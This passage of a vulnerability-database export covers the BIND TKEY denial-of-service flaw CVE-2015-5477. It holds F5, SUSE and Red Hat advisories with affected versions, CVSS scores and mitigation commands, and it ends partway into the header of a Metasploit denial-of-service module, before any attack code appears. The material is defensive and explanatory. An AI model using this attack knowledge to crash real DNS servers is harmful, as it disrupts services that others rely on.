\n11.0.0 - 11.5.3**1,2,3** \n10.1.0 - 10.2.4| 12.0.0 \n11.6.0 HF6 \n11.5.4 \n11.5.3 HF2 \n11.4.1 HF9 \n11.2.1 HF15 \n10.2.4 HF12| Severe| BIND \nBIG-IP PEM| 11.6.0**1** \n11.3.0 - 11.5.3**1**| 12.0.0 \n11.6.0 HF6 \n11.5.4 \n11.5.3 HF2 \n11.4.1 HF9| Severe| BIND \nBIG-IP PSM| 11.0.0 - 11.4.1**1** \n10.1.0 - 10.2.4| 11.4.1 HF9 \n11.2.1 HF15 \n10.2.4 HF12| Severe| BIND \nBIG-IP WebAccelerator| 11.0.0 - 11.3.0**1** \n10.1.0 - 10.2.4| 11.2.1 HF15 \n10.2.4 HF12| Severe| BIND \nBIG-IP WOM| 11.0.0 - 11.3.0**1** \n10.1.0 - 10.2.4| 11.2.1 HF15 \n10.2.4 HF12| Severe| BIND \nARX| None| 6.0.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| 3.1.14| None| Low| BIND \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| 4.0.0 - 4.5.04| None| Low| BIND \nBIG-IQ Device| 4.2.0 - 4.5.04| None| Low| BIND \nBIG-IQ Security| 4.0.0 - 4.5.04| None| Low| BIND \nBIG-IQ ADC| 4.5.04| None| Low| BIND \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| Not vulnerable| None \n \n**1**These versions are vulnerable if a self IP address or management IP address is configured to allow inbound connections on port 53. \n\n**2**These versions are vulnerable if a DNS profile is configured with the** **'Use BIND Server on BIG-IP**' **option (enabled by default). \n\n**3**These versions are vulnerable if configured with a pool that uses the Return to DNS load balancing method or when the pool's** **Alternate and Fallback load balancing methods are set to **None** and all pools associated with the wide IP are unavailable.\n\n**4**Although BIG-IQ/Enterprise Manager contains the vulnerable code, BIG-IQ/Enterprise Manager systems do not use the vulnerable code in a way that exposes the vulnerability.\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nBIG-IP\n\nTo mitigate this vulnerability, you can use the DNS Caching and DNS Express features instead of BIND. In addition, to mitigate the issue on the management IP address, restrict access to that IP address to trusted hosts only.\n\nTo mitigate the issue on the self IP address, do not allow port 53 on the self IP address. If your self IP address is configured to use the default allow, you can remove that port from the list of the default allowed services.\n\n**_Ensuring that TCP/UDP port 53 is not allowed as a default service (allow-service default)_**\n\n 1. Log in to the Traffic Management Shell (**tmsh**) by typing the following command: \n\ntmsh\n\n 2. List the default services allowed by the **allow-service default **setting, by typing the following command: \n\nlist net self-allow\n\nOutput appears similar to the following example:\n\nnet self-allow { \ndefaults { \nospf:any \ntcp:domain \ntcp:f5-iquery \ntcp:https \ntcp:snmp \ntcp:ssh \nudp:520 \nudp:cap \nudp:domain \nudp:f5-iquery \nudp:snmp \n} \n}\n\n 3. If TCP port 53 (tcp:53 or tcp:domain) or UDP port 53 (udp:53 or udp:domain) are listed as a default allowed port, you should delete the entries by typing the following command: \n\nmodify net self-allow defaults delete { tcp:domain udp:domain }\n\n 4. Save the configuration by typing the following command: \n\nsave sys config\n\n**_Disabling the Use BIND Server on BIG-IP option on the DNS profile_**\n\nTo mitigate the issue on the DNS profile, you can disable the **Use BIND Server on BIG-IP** option by performing the following procedure:\n\n 1. Log in to the Configuration utility.\n 2. Navigate to **DNS **>** Delivery** > **Profiles **> **DNS** or **Local Traffic** >** Profiles** >** Services** > **DNS.**\n 3. Select the applicable DNS profile.\n 4. From the **Use BIND Server on BIG-IP** option, select **Disabled.**\n 5. Click **Finished**.\n**Important:** Disabling the BIND server can impact DNS configurations that use BIND as a fallback method (return to DNS) for resolution.\n\nBIG-IP GTM/Link Controller\n\n**_Verifying whether you have configured any listener addresses to share a self IP (BIG-IP GTM/Link Controller)_**\n\nListener addresses that share a self IP address will expose the system to this vulnerability. To verify whether you have configured a listener address to share a self IP, run the following commands:\n\n * tmsh list /net self address\n * tmsh list /gtm listener address\n\nIf you have configured a listener address to share a self IP, you should reconfigure the address to use a unique IP address.\n\n_Choosing a load balancing method other than Return to DNS for the GTM pool (BIG-IP GTM)_\n\n**Important**: If DNS Express is not configured, BIG-IP GTM or Link Controller systems will respond to **A**, **AAAA**, and **CNAME** type DNS record queries only. Queries for other types of records, such as **NS** or **MX**, will fail. \n\nTo mitigate the issue on the GTM pool, you can use a load balancing method other than **Return to DNS** by performing the following procedure:\n\n 1. Log in to the Configuration utility.\n 2. Navigate to **DNS **>** GSLB **>** Pools.**\n 3. From the **Pool List **menu, select the applicable name.\n 4. Click the **Members** tab.\n 5. Choose a load balancing method other than **Return to DNS**.\n 6. Click **Update**.\n\n * [K14510: Overview of BIG-IP DNS request processing](<https://support.f5.com/csp/article/K14510>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n", "cvss3": {}, "published": "2015-07-28T22:18:00", "type": "f5", "title": "BIND vulnerability CVE-2015-5477", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2017-03-31T22:32:00", "id": "F5:K16909", "href": "https://support.f5.com/csp/article/K16909", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:44:24", "description": "**1**These versions are vulnerable if a self IP address or management IP address is configured to allow inbound connections on port 53. \n\n**2**These versions are vulnerable if a DNS profile is configured with the** Use BIND Server on BIG-IP **option (enabled by default). \n\n**3**These versions are vulnerable if configured with a pool that uses the **Return to DNS** load balancing method or when the pool's** Alternate** and **Fallback** load balancing methods are set to **None** and all pools associated with the wide IP are unavailable.\n\n4 Although BIG-IQ/Enterprise Manager contains the vulnerable code, BIG-IQ/Enterprise Manager systems do not use the vulnerable code in a way that exposes the vulnerability.\n\nVulnerability Recommended Actions\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the **Severity** values published in the previous table. The** Severity** values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\n**BIG-IP**\n\nTo mitigate this vulnerability, you can use the DNS Caching and DNS Express features instead of BIND. In addition, to mitigate the issue on the management IP address, restrict access to that IP address to trusted hosts only.\n\nTo mitigate the issue on the self IP address, do not allow port 53 on the self IP address. If your self IP address is configured to use the default allow, you can remove that port from the list of the default allowed services.\n\n**_Ensuring that TCP/UDP port 53 is not allowed as a default service (allow-service default)_**\n\n 1. Log in to the Traffic Management Shell (**tmsh**) by typing the following command: \n\ntmsh\n\n 2. List the default services allowed by the **allow-service default **setting, by typing the following command: \n\nlist net self-allow\n\nOutput appears similar to the following example:\n\nnet self-allow { \ndefaults { \nospf:any \ntcp:domain \ntcp:f5-iquery \ntcp:https \ntcp:snmp \ntcp:ssh \nudp:520 \nudp:cap \nudp:domain \nudp:f5-iquery \nudp:snmp \n} \n}\n\n 3. If TCP port 53 (tcp:53 or tcp:domain) or UDP port 53 (udp:53 or udp:domain) are listed as a default allowed port, you should delete the entries by typing the following command: \n\nmodify net self-allow defaults delete { tcp:domain udp:domain }\n\n 4. Save the configuration by typing the following command: \n\nsave sys config\n\n**_Disabling the Use BIND Server on BIG-IP option on the DNS profile_**\n\nTo mitigate the issue on the DNS profile, you can disable the **Use BIND Server on BIG-IP** option by performing the following procedure:\n\n 1. Log in to the Configuration utility.\n 2. Navigate to **DNS **>** Delivery** > **Profiles **> **DNS** or **Local Traffic** >** Profiles** >** Services** > **DNS.**\n 3. Select the applicable DNS profile.\n 4. From the **Use BIND Server on BIG-IP** option, select **Disabled.**\n 5. Click **Finished**.\n**Important:** Disabling the BIND server can impact DNS configurations that use BIND as a fallback method (return to DNS) for resolution.\n\n**BIG-IP GTM/Link Controller**\n\n_Verifying whether you have configured any listener addresses to share a self IP (BIG-IP GTM/Link Controller)_ \n \nListener addresses that share a self IP address will expose the system to this vulnerability. To verify whether you have configured a listener address to share a self IP, run the following commands:\n\n * tmsh list /net self address\n * tmsh list /gtm listener address\n\nIf you have configured a listener address to share a self IP, you should reconfigure the address to use a unique IP address.\n\n_Choosing a load balancing method other than Return to DNS for the GTM pool (BIG-IP GTM)_\n\n**Important**: If DNS Express is not configured, BIG-IP GTM or Link Controller systems will respond to **A**, **AAAA**, and **CNAME** type DNS record queries only. Queries for other types of records, such as **NS** or **MX**, will fail. \n \nTo mitigate the issue on the GTM pool, you can use a load balancing method other than **Return to DNS** by performing the following procedure:\n\n 1. Log in to the Configuration utility.\n 2. Navigate to **DNS **>** GSLB **>** Pools.**\n 3. From the **Pool List **menu, select the applicable name.\n 4. Click the **Members** tab.\n 5. Choose a load balancing method other than **Return to DNS**.\n 6. Click **Update**.\n\nSupplemental Information\n\n * SOL14510: Overview of BIG-IP DNS request processing\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x - 12.x)\n", "cvss3": {}, "published": "2015-07-28T00:00:00", "type": "f5", "title": "SOL16909 - BIND vulnerability CVE-2015-5477", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2016-04-29T00:00:00", "id": "SOL16909", "href": "http://support.f5.com/kb/en-us/solutions/public/16000/900/sol16909.html", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T12:18:32", "description": "bind was updated to fix one security issue.\n\n This security issue was fixed:\n - CVE-2015-5477: Remote DoS via TKEY queries (bsc#939567)\n\n Exposure to this issue can not be prevented by either ACLs or\n configuration options limiting or denying service because the exploitable\n code occurs early in the packet handling.\n\n", "cvss3": {}, "published": "2015-07-28T21:09:26", "type": "suse", "title": "Security update for bind (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2015-07-28T21:09:26", "id": "SUSE-SU-2015:1305-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00044.html", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:31:51", "description": "bind was updated to fix one security issue.\n\n This security issue was fixed:\n - CVE-2015-5477: Remote DoS via TKEY queries (boo#939567)\n\n Exposure to this issue can not be prevented by either ACLs or\n configuration options limiting or denying service because the exploitable\n code occurs early in the packet handling.\n\n", "cvss3": {}, "published": "2015-08-03T12:08:36", "type": "suse", "title": "Security update for bind (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2015-08-03T12:08:36", "id": "OPENSUSE-SU-2015:1335-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-08/msg00001.html", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:45:32", "description": "bind was updated to fix one security issue.\n\n This security issue was fixed:\n - CVE-2015-5477: Remote DoS via TKEY queries (bsc#939567)\n\n Exposure to this issue can not be prevented by either ACLs or\n configuration options limiting or denying service because the exploitable\n code occurs early in the packet handling.\n\n", "cvss3": {}, "published": "2015-07-30T14:08:45", "type": "suse", "title": "Security update for bind (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2015-07-30T14:08:45", "id": "SUSE-SU-2015:1316-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00045.html", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:40:57", "description": "bind was updated to fix one security issue.\n\n This security issue was fixed:\n - CVE-2015-5477: Remote DoS via TKEY queries (bsc#939567)\n\n Exposure to this issue can not be prevented by either ACLs or\n configuration options limiting or denying service because the exploitable\n code occurs early in the packet handling.\n\n", "cvss3": {}, "published": "2015-07-28T21:08:56", "type": "suse", "title": "Security update for bind (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2015-07-28T21:08:56", "id": "SUSE-SU-2015:1304-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00043.html", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:42:04", "description": "bind was updated to fix one security issue:\n\n * CVE-2015-5477: Remote Denial-of-Service via TKEY queries.\n (bsc#939567)\n\n Exposure to this issue can not be prevented by either ACLs or configuration\n options limiting or denying service because the exploitable code occurs\n early in the packet handling.\n\n Security Issues:\n\n * CVE-2015-5477\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5477\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5477</a>>\n\n\n", "cvss3": {}, "published": "2015-07-30T18:09:56", "type": "suse", "title": "Security update for bind (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2015-07-30T18:09:56", "id": "SUSE-SU-2015:1322-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00048.html", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:37:02", "description": "bind was updated to fix one security issue.\n\n This security issue was fixed:\n - CVE-2015-5477: Remote DoS via TKEY queries (boo#939567)\n\n Exposure to this issue can not be prevented by either ACLs or\n configuration options limiting or denying service because the exploitable\n code occurs early in the packet handling.\n\n", "cvss3": {}, "published": "2015-07-31T12:08:25", "type": "suse", "title": "Security update for bind (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2015-5477", "CVE-2015-4620", "CVE-2015-1349"], "modified": "2015-07-31T12:08:25", "id": "OPENSUSE-SU-2015:1326-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00050.html", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:08:02", "description": "This update for bind fixes the following issues:\n\n * CVE-2015-8000: Remote denial of service by mis-parsing incoming\n responses. (bsc#958861)\n * CVE-2015-5722: DoS against servers performing validation on\n DNSSEC-signed records. (bsc#944066)\n * CVE-2015-5477: DoS against authoritative and recursive servers.\n * CVE-2015-8704: Specific APL data could trigger a crash. (bsc#962189)\n\n Security Issues:\n\n * CVE-2015-8000\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8000\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8000</a>>\n * CVE-2015-5722\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5722\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5722</a>>\n * CVE-2015-5477\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5477\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5477</a>>\n * CVE-2015-8704\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8704\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8704</a>>\n\n\n", "cvss3": {}, "published": "2016-01-25T15:11:48", "type": "suse", "title": "Security update for bind (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2015-8704", "CVE-2015-5477", "CVE-2015-8000", "CVE-2015-5722"], "modified": "2016-01-25T15:11:48", "id": "SUSE-SU-2016:0227-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00033.html", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2021-10-19T18:41:49", "description": "The Berkeley Internet Name Domain (BIND) is an implementation of the Domain\nName System (DNS) protocols. BIND includes a DNS server (named); a resolver\nlibrary (routines for applications to use when interfacing with DNS); and\ntools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource\nrecords. A remote attacker could use this flaw to make named (functioning\nas an authoritative DNS server or a DNS resolver) exit unexpectedly with an\nassertion failure via a specially crafted DNS request packet.\n(CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\n", "cvss3": {}, "published": "2015-07-28T00:00:00", "type": "redhat", "title": "(RHSA-2015:1513) Important: bind security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2018-06-06T16:24:18", "id": "RHSA-2015:1513", "href": "https://access.redhat.com/errata/RHSA-2015:1513", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-10-21T04:42:34", "description": "The Berkeley Internet Name Domain (BIND) is an implementation of the Domain\nName System (DNS) protocols. BIND includes a DNS server (named); a resolver\nlibrary (routines for applications to use when interfacing with DNS); and\ntools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource\nrecords. A remote attacker could use this flaw to make named (functioning\nas an authoritative DNS server or a DNS resolver) exit unexpectedly with an\nassertion failure via a specially crafted DNS request packet.\n(CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\n", "cvss3": {}, "published": "2015-07-28T00:00:00", "type": "redhat", "title": "(RHSA-2015:1514) Important: bind security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2017-09-08T08:17:54", "id": "RHSA-2015:1514", "href": "https://access.redhat.com/errata/RHSA-2015:1514", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-10-21T04:43:49", "description": "The Berkeley Internet Name Domain (BIND) is an implementation of the Domain\nName System (DNS) protocols. BIND includes a DNS server (named); a resolver\nlibrary (routines for applications to use when interfacing with DNS); and\ntools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource\nrecords. A remote attacker could use this flaw to make named (functioning\nas an authoritative DNS server or a DNS resolver) exit unexpectedly with an\nassertion failure via a specially crafted DNS request packet.\n(CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind97 users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\n", "cvss3": {}, "published": "2015-07-28T00:00:00", "type": "redhat", "title": "(RHSA-2015:1515) Important: bind97 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2017-09-08T08:16:32", "id": "RHSA-2015:1515", "href": "https://access.redhat.com/errata/RHSA-2015:1515", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-10-21T04:47:11", "description": "The Berkeley Internet Name Domain (BIND) is an implementation of the Domain\nName System (DNS) protocols. BIND includes a DNS server (named); a resolver\nlibrary (routines for applications to use when interfacing with DNS); and\ntools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource\nrecords. A remote attacker could use this flaw to make named (functioning\nas an authoritative DNS server or a DNS resolver) exit unexpectedly with an\nassertion failure via a specially crafted DNS request packet.\n(CVE-2015-5477)\n\nA denial of service flaw was found in the way BIND parsed certain malformed\nDNSSEC keys. A remote attacker could use this flaw to send a specially\ncrafted DNS query (for example, a query requiring a response from a zone\ncontaining a deliberately malformed key) that would cause named functioning\nas a validating resolver to crash. (CVE-2015-5722)\n\nA denial of service flaw was found in the way BIND processed certain\nrecords with malformed class attributes. A remote attacker could use this\nflaw to send a query to request a cached record with a malformed class\nattribute that would cause named functioning as an authoritative or\nrecursive server to crash. (CVE-2015-8000)\n\nNote: This issue affects authoritative servers as well as recursive\nservers, however authoritative servers are at limited risk if they perform\nauthentication when making recursive queries to resolve addresses for\nservers listed in NS RRSETs.\n\nRed Hat would like to thank ISC for reporting the CVE-2015-5477,\nCVE-2015-5722, and CVE-2015-8000 issues. Upstream acknowledges Jonathan\nFoote as the original reporter of CVE-2015-5477, and Hanno B\u00f6ck as the\noriginal reporter of CVE-2015-5722.\n\nAll bind users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing the\nupdate, the BIND daemon (named) will be restarted automatically.", "cvss3": {}, "published": "2016-01-28T00:00:00", "type": "redhat", "title": "(RHSA-2016:0079) Important: bind security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477", "CVE-2015-5722", "CVE-2015-8000"], "modified": "2016-09-03T22:18:39", "id": "RHSA-2016:0079", "href": "https://access.redhat.com/errata/RHSA-2016:0079", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-10-21T04:45:47", "description": "The Berkeley Internet Name Domain (BIND) is an implementation of the Domain\nName System (DNS) protocols. BIND includes a DNS server (named); a resolver\nlibrary (routines for applications to use when interfacing with DNS); and\ntools for verifying that the DNS server is operating correctly.\n\nA denial of service flaw was found in the way BIND followed DNS\ndelegations. A remote attacker could use a specially crafted zone\ncontaining a large number of referrals which, when looked up and processed,\nwould cause named to use excessive amounts of memory or crash.\n(CVE-2014-8500)\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource\nrecords. A remote attacker could use this flaw to make named (functioning\nas an authoritative DNS server or a DNS resolver) exit unexpectedly with an\nassertion failure via a specially crafted DNS request packet.\n(CVE-2015-5477)\n\nA denial of service flaw was found in the way BIND parsed certain malformed\nDNSSEC keys. A remote attacker could use this flaw to send a specially\ncrafted DNS query (for example, a query requiring a response from a zone\ncontaining a deliberately malformed key) that would cause named functioning\nas a validating resolver to crash. (CVE-2015-5722)\n\nA denial of service flaw was found in the way BIND processed certain\nrecords with malformed class attributes. A remote attacker could use this\nflaw to send a query to request a cached record with a malformed class\nattribute that would cause named functioning as an authoritative or\nrecursive server to crash. (CVE-2015-8000)\n\nNote: This issue affects authoritative servers as well as recursive\nservers, however authoritative servers are at limited risk if they perform\nauthentication when making recursive queries to resolve addresses for\nservers listed in NS RRSETs.\n\nRed Hat would like to thank ISC for reporting the CVE-2015-5477,\nCVE-2015-5722, and CVE-2015-8000 issues. Upstream acknowledges Jonathan\nFoote as the original reporter of CVE-2015-5477, and Hanno B\u00f6ck as the\noriginal reporter of CVE-2015-5722.\n\nAll bind users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing the\nupdate, the BIND daemon (named) will be restarted automatically.", "cvss3": {}, "published": "2016-01-28T00:00:00", "type": "redhat", "title": "(RHSA-2016:0078) Important: bind security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8500", "CVE-2015-5477", "CVE-2015-5722", "CVE-2015-8000"], "modified": "2016-09-03T22:14:18", "id": "RHSA-2016:0078", "href": "https://access.redhat.com/errata/RHSA-2016:0078", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "metasploit": [{"lastseen": "2022-03-17T23:59:24", "description": "This module sends a malformed TKEY query, which exploits an error in handling TKEY queries on affected BIND9 'named' DNS servers. As a result, a vulnerable named server will exit with a REQUIRE assertion failure. This condition can be exploited in versions of BIND between BIND 9.1.0 through 9.8.x, 9.9.0 through 9.9.7-P1 and 9.10.0 through 9.10.2-P2.\n", "cvss3": {}, "published": "2015-08-01T11:01:35", "type": "metasploit", "title": "BIND TKEY Query Denial of Service", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2018-11-16T18:18:28", "id": "MSF:AUXILIARY/DOS/DNS/BIND_TKEY/", "href": "https://www.rapid7.com/db/modules/auxiliary/dos/dns/bind_tkey/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Capture\n include Msf::Auxiliary::UDPScanner\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BIND TKEY Query Denial of Service',\n 'Description' => %q{\n This module sends a malformed TKEY query, which exploits an\n error in handling TKEY queries on affected BIND9 'named' DNS servers.\n As a result, a vulnerable named server will exit with a REQUIRE\n assertion failure. This condition can be exploited in versions of BIND\n between BIND 9.1.0 through 9.8.x, 9.9.0 through 9.9.7-P1 and 9.10.0\n through 9.10.2-P2.\n },\n 'Author' => [\n 'Jonathan Foote', # Original discoverer\n 'throwawayokejxqbbif', # PoC\n 'wvu' # Metasploit module\n ],\n 'References' => [\n ['CVE', '2015-5477'],\n ['URL', 